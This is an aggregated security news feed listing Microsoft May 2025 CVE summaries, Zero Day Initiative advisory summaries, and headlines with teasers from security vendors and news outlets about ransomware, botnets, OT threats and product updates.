2025-05-13T07:00:00Z | 1747119600

Concurrent execution using shared resource with improper synchronization ('race condition') in Universal Print Management Service allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29841
CVE-2025-29840 Windows Media Remote Code Execution Vulnerability
2025-05-13T07:00:00Z | 1747119600

Stack-based buffer overflow in Windows Media allows an unauthorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29840
CVE-2025-29839 Windows Multiple UNC Provider Driver Information Disclosure Vulnerability
2025-05-13T07:00:00Z | 1747119600

Out-of-bounds read in Windows File Server allows an unauthorized attacker to disclose information locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29839
CVE-2025-29838 Windows ExecutionContext Driver Elevation of Privilege Vulnerability
2025-05-13T07:00:00Z | 1747119600

Null pointer dereference in Windows Drivers allows an unauthorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29838
CVE-2025-29837 Windows Installer Information Disclosure Vulnerability
2025-05-13T07:00:00Z | 1747119600

Improper link resolution before file access ('link following') in Windows Installer allows an authorized attacker to disclose information locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29837
CVE-2025-29836 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability
2025-05-13T07:00:00Z | 1747119600

Out-of-bounds read in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to disclose information over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29836
CVE-2025-29835 Windows Remote Access Connection Manager Information Disclosure Vulnerability
2025-05-13T07:00:00Z | 1747119600

Out-of-bounds read in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to disclose information over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29835
CVE-2025-29833 Microsoft Virtual Machine Bus (VMBus) Remote Code Execution Vulnerability
2025-05-13T07:00:00Z | 1747119600

Time-of-check time-of-use (toctou) race condition in Windows Virtual Machine Bus allows an authorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29833
CVE-2025-29832 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability
2025-05-13T07:00:00Z | 1747119600

Out-of-bounds read in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to disclose information over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29832
CVE-2025-29831 Windows Remote Desktop Services Remote Code Execution Vulnerability
2025-05-13T07:00:00Z | 1747119600

Use after free in Remote Desktop Gateway Service allows an unauthorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29831
CVE-2025-29830 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability
2025-05-13T07:00:00Z | 1747119600

Use of uninitialized resource in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to disclose information over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29830
CVE-2025-29829 Windows Trusted Runtime Interface Driver Information Disclosure Vulnerability
2025-05-13T07:00:00Z | 1747119600

Use of uninitialized resource in Windows Trusted Runtime Interface Driver allows an authorized attacker to disclose information locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29829
CVE-2025-26685 Microsoft Defender for Identity Spoofing Vulnerability
2025-05-13T07:00:00Z | 1747119600

Improper authentication in Microsoft Defender for Identity allows an unauthorized attacker to perform spoofing over an adjacent network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26685
CVE-2025-27488 Microsoft Windows Hardware Lab Kit (HLK) Elevation of Privilege Vulnerability
2025-05-13T07:00:00Z | 1747119600

Use of hard-coded credentials in Windows Hardware Lab Kit allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27488
CVE-2025-26677 Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability
2025-05-13T07:00:00Z | 1747119600

Uncontrolled resource consumption in Remote Desktop Gateway Service allows an unauthorized attacker to deny service over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26677
CVE-2025-32709 Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability
2025-05-13T07:00:00Z | 1747119600

Use after free in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-32709
CVE-2025-21264 Visual Studio Code Security Feature Bypass Vulnerability
2025-05-13T07:00:00Z | 1747119600

Files or directories accessible to external parties in Visual Studio Code allows an unauthorized attacker to bypass a security feature locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21264
CVE-2025-32706 Windows Common Log File System Driver Elevation of Privilege Vulnerability
2025-05-13T07:00:00Z | 1747119600

Improper input validation in Windows Common Log File System Driver allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-32706
CVE-2025-32703 Visual Studio Information Disclosure Vulnerability
2025-05-13T07:00:00Z | 1747119600

Insufficient granularity of access control in Visual Studio allows an authorized attacker to disclose information locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-32703
CVE-2025-32701 Windows Common Log File System Driver Elevation of Privilege Vulnerability
2025-05-13T07:00:00Z | 1747119600

Use after free in Windows Common Log File System Driver allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-32701
CVE-2025-30400 Microsoft DWM Core Library Elevation of Privilege Vulnerability
2025-05-13T07:00:00Z | 1747119600

Use after free in Windows DWM allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-30400
CVE-2025-30394 Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability
2025-05-13T07:00:00Z | 1747119600

Sensitive data storage in improperly locked memory in Remote Desktop Gateway Service allows an unauthorized attacker to deny service over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-30394
CVE-2025-29826 Microsoft Dataverse Elevation of Privilege Vulnerability
2025-05-13T07:00:00Z | 1747119600

Improper handling of insufficient permissions or privileges in Microsoft Dataverse allows an authorized attacker to elevate privileges over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29826
CVE-2025-30393 Microsoft Excel Remote Code Execution Vulnerability
2025-05-13T07:00:00Z | 1747119600

Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-30393
CVE-2025-27468 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability
2025-05-13T07:00:00Z | 1747119600

Improper privilege management in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27468
CVE-2025-30387 Document Intelligence Studio On-Prem Elevation of Privilege Vulnerability
2025-05-13T07:00:00Z | 1747119600

Improper limitation of a pathname to a restricted directory ('path traversal') in Azure allows an unauthorized attacker to elevate privileges over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-30387
CVE-2025-30386 Microsoft Office Remote Code Execution Vulnerability
2025-05-13T07:00:00Z | 1747119600

Use after free in Microsoft Office allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-30386
CVE-2025-30384 Microsoft SharePoint Server Remote Code Execution Vulnerability
2025-05-13T07:00:00Z | 1747119600

Deserialization of untrusted data in Microsoft Office SharePoint allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-30384
CVE-2025-30383 Microsoft Excel Remote Code Execution Vulnerability
2025-05-13T07:00:00Z | 1747119600

Access of resource using incompatible type ('type confusion') in Microsoft Office Excel allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-30383
CVE-2025-30382 Microsoft SharePoint Server Remote Code Execution Vulnerability
2025-05-13T07:00:00Z | 1747119600

Deserialization of untrusted data in Microsoft Office SharePoint allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-30382
CVE-2025-30381 Microsoft Excel Remote Code Execution Vulnerability
2025-05-13T07:00:00Z | 1747119600

Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-30381
CVE-2025-30379 Microsoft Excel Remote Code Execution Vulnerability
2025-05-13T07:00:00Z | 1747119600

Release of invalid pointer or reference in Microsoft Office Excel allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-30379
CVE-2025-30378 Microsoft SharePoint Server Remote Code Execution Vulnerability
2025-05-13T07:00:00Z | 1747119600

Deserialization of untrusted data in Microsoft Office SharePoint allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-30378
CVE-2025-30377 Microsoft Office Remote Code Execution Vulnerability
2025-05-13T07:00:00Z | 1747119600

Use after free in Microsoft Office allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-30377
CVE-2025-30376 Microsoft Excel Remote Code Execution Vulnerability
2025-05-13T07:00:00Z | 1747119600

Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-30376
CVE-2025-30375 Microsoft Excel Remote Code Execution Vulnerability
2025-05-13T07:00:00Z | 1747119600

Access of resource using incompatible type ('type confusion') in Microsoft Office Excel allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-30375
CVE-2025-29978 Microsoft PowerPoint Remote Code Execution Vulnerability
2025-05-13T07:00:00Z | 1747119600

Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29978
CVE-2025-29977 Microsoft Excel Remote Code Execution Vulnerability
2025-05-13T07:00:00Z | 1747119600

Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29977
CVE-2025-29976 Microsoft SharePoint Server Elevation of Privilege Vulnerability
2025-05-13T07:00:00Z | 1747119600

Improper privilege management in Microsoft Office SharePoint allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29976
CVE-2025-29975 Microsoft PC Manager Elevation of Privilege Vulnerability
2025-05-13T07:00:00Z | 1747119600

Improper link resolution before file access ('link following') in Microsoft PC Manager allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29975
CVE-2025-29973 Microsoft Azure File Sync Elevation of Privilege Vulnerability
2025-05-13T07:00:00Z | 1747119600

Improper access control in Azure File Sync allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29973
CVE-2025-29971 Web Threat Defense (WTD.sys) Denial of Service Vulnerability
2025-05-13T07:00:00Z | 1747119600

Out-of-bounds read in Web Threat Defense (WTD.sys) allows an unauthorized attacker to deny service over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29971
CVE-2025-29970 Microsoft Brokering File System Elevation of Privilege Vulnerability
2025-05-13T07:00:00Z | 1747119600

Use after free in Microsoft Brokering File System allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29970
CVE-2025-29969 MS-EVEN RPC Remote Code Execution Vulnerability
2025-05-13T07:00:00Z | 1747119600

Time-of-check time-of-use (toctou) race condition in Windows Fundamentals allows an authorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29969
CVE-2025-29968 Active Directory Certificate Services (AD CS) Denial of Service Vulnerability
2025-05-13T07:00:00Z | 1747119600

Improper input validation in Active Directory Certificate Services (AD CS) allows an authorized attacker to deny service over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29968
CVE-2025-29967 Remote Desktop Client Remote Code Execution Vulnerability
2025-05-13T07:00:00Z | 1747119600

Heap-based buffer overflow in Remote Desktop Gateway Service allows an unauthorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29967
CVE-2025-29966 Remote Desktop Client Remote Code Execution Vulnerability
2025-05-13T07:00:00Z | 1747119600

Heap-based buffer overflow in Windows Remote Desktop allows an unauthorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29966
CVE-2025-29964 Windows Media Remote Code Execution Vulnerability
2025-05-13T07:00:00Z | 1747119600

Heap-based buffer overflow in Windows Media allows an unauthorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29964
CVE-2025-29960 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability
2025-05-13T07:00:00Z | 1747119600

Out-of-bounds read in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to disclose information over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29960
CVE-2025-29959 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability
2025-05-13T07:00:00Z | 1747119600

Use of uninitialized resource in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to disclose information over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29959
CVE-2025-26684 Microsoft Defender Elevation of Privilege Vulnerability
2025-05-13T07:00:00Z | 1747119600

External control of file name or path in Microsoft Defender for Endpoint allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26684
CVE-2025-26646 .NET, Visual Studio, and Build Tools for Visual Studio Spoofing Vulnerability
2025-05-13T07:00:00Z | 1747119600

External control of file name or path in .NET, Visual Studio, and Build Tools for Visual Studio allows an authorized attacker to perform spoofing over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26646
ZDI-CAN-26647: ATEN
2025-05-13T05:00:00Z | 1747112400

A CVSS score 8.8 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Vu Khanh Trinh (@_Sonicrr) from VNPT Cyber Immunity' was reported to the affected vendor on: 2025-05-13, 24 days ago. The vendor is given until 2025-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-25-285: Dassault Systèmes eDrawings Viewer SLDPRT File Parsing Use-After-Free Remote Code Execution Vulnerability
2025-05-13T05:00:00Z | 1747112400

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Dassault Syst��mes eDrawings Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-1884.

http://www.zerodayinitiative.com/advisories/ZDI-25-285/
ZDI-25-286: Dassault Systèmes eDrawings Viewer OBJ File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability
2025-05-13T05:00:00Z | 1747112400

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Dassault Syst��mes eDrawings Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-1883.

http://www.zerodayinitiative.com/advisories/ZDI-25-286/
ZDI-25-287: JetBrains TeamCity Diagnostics Data Directory Cross-Site Scripting Vulnerability
2025-05-13T05:00:00Z | 1747112400

This vulnerability allows remote attackers to execute arbitrary script on affected installations of JetBrains TeamCity. Minimal user interaction is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 5.4. The following CVEs are assigned: CVE-2025-46618.

http://www.zerodayinitiative.com/advisories/ZDI-25-287/
ZDI-25-288: Fortinet FortiWeb cgi_httpcontentrouting_post Directory Traversal Remote Code Execution Vulnerability
2025-05-13T05:00:00Z | 1747112400

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Fortinet FortiWeb. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2025-25254.

http://www.zerodayinitiative.com/advisories/ZDI-25-288/
ZDI-25-289: Rockwell Automation ThinManager ThinServer Null Pointer Dereference Denial-of-Service Vulnerability
2025-05-13T05:00:00Z | 1747112400

This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Rockwell Automation ThinManager. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2025-3618.

http://www.zerodayinitiative.com/advisories/ZDI-25-289/
ZDI-25-290: Rockwell Automation ThinManager ThinServer Link Following Local Privilege Escalation Vulnerability
2025-05-13T05:00:00Z | 1747112400

This vulnerability allows local attackers to escalate privileges on affected installations of Rockwell Automation ThinManager. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-3617.

http://www.zerodayinitiative.com/advisories/ZDI-25-290/
Neo BPO Reduces Absenteeism and Turnover with Verint Interviewing Bot
2025-05-13T04:52:43Z | 1747111963

Learn how the Verint Bot helps Neo BPO elevate CX automation, and delivering concrete outcomes, including a 29% reduction in turnover. The post Neo BPO Reduces Absenteeism and Turnover with Verint Interviewing Bot appeared first on Verint.

https://www.verint.com/resources/neo-bpo-reduces-absenteeism-and-turnover-with-verint-interviewing-bot/
Security Alert (A25-05-08): Multiple Vulnerabilities in Apple Products
2025-05-13T04:00:00Z | 1747108800

Apple has released iOS 18.5, iPadOS 18.5, macOS Sequoia 15.5, macOS Sonoma 14.7.6, macOS Ventura 13.7.6 and Safari 18.5 to fix the multiple vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Trainline Doubles Agent Capacity with Verint
2025-05-13T02:53:09Z | 1747104789

Hear Robert McGough at Trainline share how the organization has significantly improved performance metrics with Verint Agent Virtual Assistant. The post Trainline Doubles Agent Capacity with Verint appeared first on Verint.

https://www.verint.com/resources/trainline-doubles-agent-capacity-with-verint/
Rising Threats Target OT Environments: 5 Ways to Stop Them
2025-05-13T01:00:00Z | 1747098000

Learn how to protect OT environments from rising cyber threats. Discover five proven strategies to secure critical infrastructure and reduce OT risks.

https://www.opswat.com/blog/rising-ot-threats-5-ways-to-stop-them
Vectra AI Platform Visualizes Multi-domain Modern Attacks with Attack Graphs by Zoey Chu
2025-05-13T00:00:00Z | 1747094400

Vectra AI’s Attack Graphs optimizes, streamlines, and accelerates attack and threat investigations for the modern security analyst.

https://www.vectra.ai/blog/vectra-ai-platform-visualizes-multi-domain-modern-attacks-with-attack-graphs
Microsegmentation and Zero Trust: How to Accelerate Security Roadmaps
2025-05-12T19:50:00Z | 1747079400

Data breach notices jumped more than 300% last year, ransomware attacks have already doubled so far in 2025, and nearly three-quarters of security leaders say they’re facing increasingly sophisticated cyber risks. The takeaway? Traditional network security strategies no longer cut it. In an era where cyber threats and enterprise networks are constantly evolving, Zero Trust is a critical security building block – not a buzzword. Still, 90% of organizations have yet to achieve an…

https://zeronetworks.com/blog/microsegmentation-and-zero-trust
Flashpoint Investigation: Uncovering the DPRK’s Remote IT Worker Fraud Scheme
2025-05-12T19:05:42Z | 1747076742

In this post, we delve into Flashpoint's investigation of a multi-million dollar North Korean remote IT worker fraud scheme, revealing their deceptive tactics through the analysis of compromised credentials and infostealer logs. The post Flashpoint Investigation: Uncovering the DPRK’s Remote IT Worker Fraud Scheme appeared first on Flashpoint.

https://flashpoint.io/blog/flashpoint-investigation-uncovering-the-dprks-remote-it-worker-fraud-scheme/
Russia’s ‘outsourced’ Bulgarian spy ring sentenced to more than 50 years in UK
2025-05-12T17:34:06Z | 1747071246

Six Bulgarians tasked with spy operations in the U.K. on behalf of Russian intelligence each received multi-year prison sentences for their activities.

https://therecord.media/bulgarian-members-russian-spy-ring-sentenced-uk
Outils open-source des attaquants exploitant Ivanti CSA
2025-05-12T17:21:29Z | 1747070489

https://www.synacktiv.com/publications/outils-open-source-des-attaquants-exploitant-ivanti-csa.html
WAF 3.6 Enhances Security Without Compromising Performance
2025-05-12T16:01:55Z | 1747065715

WAF 3.6 release packs some serious punch when it comes to precision targeting, monitoring capabilities, and operational stability. Let’s dive into what makes this release special and how these enhancements can benefit your security posture. Client-ID-Based Blocking: Precision That Matters Traditionally, WAFs rely on source IPs to block malicious traffic. But what happens when both […] The post WAF 3.6 Enhances Security Without Compromising Performance appeared first on Hillstone Networks.

https://www.hillstonenet.com/blog/waf-3-6-enhances-security-without-compromising-performance/
Reimagining Data Security: Why SentinelOne is Investing in Theom.ai
2025-05-12T16:00:21Z | 1747065621

S Ventures invests in Theom.ai, a company redefining data security and governance with their AI-native Data Operations Center (DOC) platform.

https://www.sentinelone.com/blog/reimagining-data-security-why-sentinelone-is-investing-in-theom-ai/
Security, Uninterrupted: Inside Qualys’ Zero-Touch Security Vision with Qualys Cloud Agent
2025-05-12T16:00:00Z | 1747065600

New Feature: Remote Log Collection for Seamless Troubleshooting and Analysis In the modern enterprise, where resilience and scale are non-negotiable, the margin for error in cybersecurity has all but disappeared. Yet the tools available to security teams remain tethered to legacy workflows—dependent on IT tickets, cross-functional handoffs, and manual steps for even routine tasks like […]

https://blog.qualys.com/category/product-tech
South African influencers-for-hire target Ukraine’s president in influence campaign, researchers say
2025-05-12T15:59:11Z | 1747065551

A new analysis from the Atlantic Council’s Digital Forensic Research Lab (DFRLab) identified over 40 accounts involved in the traffic manipulation campaign, which garnered 290,000 views.

https://therecord.media/south-african-influencers-anti-zelensky-campaign
The Future of SSE From the Customer Point of View
2025-05-12T15:02:51Z | 1747062171

I joined Skyhigh Security six months ago and one of the most enjoyable and insightful things I’ve done in those... The post The Future of SSE From the Customer Point of View appeared first on Skyhigh Security.

https://www.skyhighsecurity.com/industry-perspectives/the-future-of-sse-from-the-customer-point-of-view.html
Dragos Knowledge Pack Update: Strengthen Your Detection of Ransomware Threats
2025-05-12T14:15:07Z | 1747059307

Ransomware remains a critical and escalating threat to organizations globally, significantly impacting operational technology (OT) environments and critical infrastructure. The... The post Dragos Knowledge Pack Update: Strengthen Your Detection of Ransomware Threats  first appeared on Dragos.

https://www.dragos.com/blog/dragos-knowledge-pack-update-strengthen-your-detection-of-ransomware-threats/
Up and running with Stratoshark in 5 minutes
2025-05-12T13:45:00Z | 1747057500

What is Stratoshark? Stratoshark — created by Wireshark founder Gerald Combs and Falco creator Loris Degioanni — brings Wireshark’s deep... The post Up and running with Stratoshark in 5 minutes appeared first on Sysdig.

https://sysdig.com/blog/up-and-running-with-stratoshark-in-5-minutes/
Up and running with Stratoshark in 5 minutes
2025-05-12T13:45:00Z | 1747057500

What is Stratoshark? Stratoshark — created by Wireshark founder Gerald Combs and Falco creator Loris Degioanni — brings Wireshark’s deep... The post Up and running with Stratoshark in 5 minutes appeared first on Sysdig.

https://sysdig.com/blog/up-and-running-with-stratoshark-in-5-minutes/
Anti-Ransomware Day 2025: 10 Years of RaaS and the Making of a Billion-Dollar Business
2025-05-12T13:00:35Z | 1747054835

This Anti-Ransomware Day, we look at a decade of RaaS activity and how ransomware has evolved into a billion-dollar criminal enterprise.

https://www.sentinelone.com/blog/anti-ransomware-day-2025-10-years-of-raas/
Taking Sustainability to Heart
2025-05-12T13:00:00Z | 1747054800

Reducing energy waste is an operations principle for NETSCOUT. Lean operations support both cost savings and companywide sustainability goals. As discussed in our previous blog on sustainability, NETSCOUT has made significant progress in reducing the amount of energy consumed by its InfiniStream network monitoring...

https://www.netscout.com/blog/taking-sustainability-heart
Smarter Cybersecurity for SMEs: Visibility, Control, and Trust Without Breaking the Bank
2025-05-12T12:43:05Z | 1747053785

SMEs are facing growing cyber threats but often lack the resources to respond effectively. This blog explores how Genians empowers US SMEs with smarter, value-driven cybersecurity. By combining NAC and ZTNA (aka. Universal ZTNA) and powered by Device Platform Intelligence, Genians provides enterprise-grade access control without the complexity or high costs of traditional solutions. Discover how Genians helps SMEs, MSPs, and MSSPs secure their networks efficiently, affordably, and on their own terms.

https://www.genians.com/learn-more/trends/smarter-cybersecurity-for-smes-visibility-control-and-trust-without-breaking-the-bank/
Security considerations for voice-activated digital assistants - ITSAP.70.013
2025-05-12T12:42:58Z | 1747053778

https://cyber.gc.ca/en/guidance/security-considerations-voice-activated-digital-assistants-itsap70013
Eesti äpp testib esmakordselt ohuteavituse saatmise funktsiooni
2025-05-12T12:30:01Z | 1747053001

Kaitseväe suurõppusel Siil käivitatakse kolmapäeval, 14. mail 2025 esmakordselt ohuteavituse terviksüsteem, sealhulgas sireenid 22 Eesti asulas. Selle raames testib ka "Eesti äpp" esmakordselt ohuteavituse funktsiooni.

https://ria.ee/uudised/eesti-app-testib-esmakordselt-ohuteavituse-saatmise-funktsiooni
MITRE’s near miss: Lessons learned for security and vulnerability management
2025-05-12T12:03:39Z | 1747051419

Cybersecurity leaders can use recent CVE database worries as inspiration to better protect themselves

https://www.itpro.com/security/mitre-lessons-learned-security-vulnerability
Cisco Schedules Conference Call for Q3 Fiscal Year 2025 Financial Results
2025-05-12T12:00:00Z | 1747051200

Cisco has scheduled a conference call for Wednesday, May 14, 2025, at 1:30 PM (PT); 4:30 PM (ET) to announce its third quarter financial results for the period ending Saturday, April 26, 2025.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m04/cisco-schedules-conference-call-for-q3-fiscal-year-2025-financial-results.html
Quantum-Safe by Default: Navigating CJIS 6.0 Compliance with Certes DPRM
2025-05-12T11:10:43Z | 1747048243

CJIS 6.0 is more than an update, it’s a critical step toward achieving and maintaining full CJIS compliance in an evolving threat landscape. With sweeping changes to cryptographic requirements, system protection, access control, and cloud adoption, criminal justice agencies are under pressure to modernize fast. The challenge for CJIS compliance? Meeting these demands without compromising data control or operational continuity. The post Quantum-Safe by Default: Navigating CJIS 6.0 Compliance with Certes DPRM appeared first on Certes.

https://certes.ai/2025/05/12/cjis-compliance-quantum-safe-by-default/
FBI takes down botnet exploiting aging routers
2025-05-12T10:45:29Z | 1747046729

Organizations warned they should replace potentially affected devices

https://www.itpro.com/security/fbi-takes-down-botnet-exploiting-aging-routers
How can we counter online disinformation? | Unlocked 403 cybersecurity podcast (S2E2)
2025-05-12T09:00:00Z | 1747040400

Ever wondered why a lie can spread faster than the truth? Tune in for an insightful look at disinformation and how we can fight one of the most pressing challenges facing our digital world.

https://www.welivesecurity.com/en/videos/online-disinformation-unlocked-403-cybersecurity-podcast-s2e2/
The Cybersecurity Skills Challenge and Its Impact on Enterprises
2025-05-12T08:46:32Z | 1747039592

The post The Cybersecurity Skills Challenge and Its Impact on Enterprises appeared first on Cato Networks.

https://www.catonetworks.com/resources/the-cybersecurity-skills-challenge/
Navigating the World of Patching: Why Legacy Security Architectures Keep You Exposed
2025-05-12T08:39:40Z | 1747039180

Introduction: Patching Is Still Critical—and Still a Problem  A recent blog from a leading security vendor highlights what most security teams already know: attackers don’t need zero days to win. They exploit known vulnerabilities— “N-days”—because they know how hard it is for organizations to keep up with patching.  The irony? That same vendor, like many... The post Navigating the World of Patching: Why Legacy Security Architectures Keep You Exposed   appeared first on Cato Networks.

https://www.catonetworks.com/blog/why-legacy-security-architectures-keep-you-exposed/
High Risk Warning for Windows Ecosystem: New Botnet Family HTTPBot is Expanding
2025-05-12T05:55:51Z | 1747029351

Overview In April 2025, the Global Threat Hunting system of NSFOCUS Fuying Lab detected a significant increase in the activity of a new Botnet Trojan developed based on Go language. Given that many of its built-in DDoS attack methods are HTTP-based, Fuying Lab named it HTTPBot. The HTTPBot Botnet family first came into our monitoring […] The post High Risk Warning for Windows Ecosystem: New Botnet Family HTTPBot is Expanding appeared first on NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks..

https://nsfocusglobal.com/high-risk-warning-for-windows-ecosystem-new-botnet-family-httpbot-is-expanding/
OPSWAT at GITEX: Join us at Europe’s Premier Tech Event
2025-05-12T02:00:00Z | 1747015200

We’re heading to Berlin this May for our very first GITEX Europe Tech Event, and we couldn’t be more excited to be part of it.

https://www.opswat.com/blog/opswat-at-gitex-join-us-at-europes-premier-tech-event
How OPSWAT Enabled Large-Scale S3 Scanning with Automation and Advanced Reporting
2025-05-12T01:00:00Z | 1747011600

S3 scanning automation by OPSWAT streamlines cloud storage security with advanced reporting, real-time insights, and compliance for large-scale environments.

https://www.opswat.com/blog/how-opswat-enabled-large-scale-s3-scanning-with-automation-and-advanced-reporting
MetaDefender Endpoint Security SDK Release Announcement | May 2025
2025-05-11T19:04:00Z | 1746990240

Get ready to supercharge your endpoint protection solutions with expanded support for more products and some new, exciting features.

https://www.opswat.com/blog/sdk-news-may-2025
Mothers of SentinelOne Balance Cybersecurity & Parenthood
2025-05-11T13:00:36Z | 1746968436

Celebrate Mother's Day with SentinelOne as we share three working mothers' stories on how they balance parenthood and cybersecurity.

https://www.sentinelone.com/blog/mothers-of-sentinelone-balance-cybersecurity-parenthood/
CERT.LV activity review Q1 2025
2025-05-10T06:48:58Z | 1746859738

In the first three months of 2025, the cyber threat landscape in Latvia and elsewhere continues to evolve with increasing intensity, complexity and strategic direction. Cyber-operations are no longer just one-off attacks or attempts to profit - they are increasingly targeted, persistent and aligned with wider geopolitical and economic developments.

https://cert.lv/en/2025/05/cert-lv-activity-review-q1-2025
Breaking the Sound Barrier Part I: Fuzzing CoreAudio with Mach Messages
2025-05-09T17:38:00Z | 1746812280

